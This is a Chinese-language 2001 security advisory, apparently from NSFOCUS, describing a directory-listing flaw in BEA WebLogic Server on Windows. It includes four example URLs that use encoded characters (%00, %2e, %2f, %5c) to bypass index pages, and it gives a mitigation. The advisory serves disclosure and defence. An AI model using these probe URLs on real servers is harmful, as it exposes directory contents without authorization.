发布日期：2001-03-29
更新日期：2001-03-29

受影响系统：

Bea Weblogic Server 6.0
Bea Weblogic Server 5.1
Bea Weblogic Server 4.5.1
  - Microsoft Windows NT
  - Microsoft Windows 2000

描述：

---

Bea weblogic在Windows平台下的版本存在一个安全漏洞，攻击者可以在一个URL后面
增加一些特殊的编码字符（例如%00,%2e,%2f或%5c），可能导致绕过缺省浏览文档(例
如，index.html)的限制,从而得到web目录的内容列表。


<*来源：Peter Grundl (peter.grundl@defcom.com) *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Peter Grundl (peter.grundl@defcom.com)提供了下列测试代码：
http://www.foo.org/%00/
http://www.foo.org/images/%2e/
http://www.foo.org/passwords/%2f/
http://www.foo.org/creditcard/%5c/

建议：

---

临时解决方法：

NSFOCUS建议您在weblogic的控制台上将"index directory"选项从"enabled"设为"disabled"

厂商补丁：
暂无


浏览次数：4103
严重程度：0（网友投票）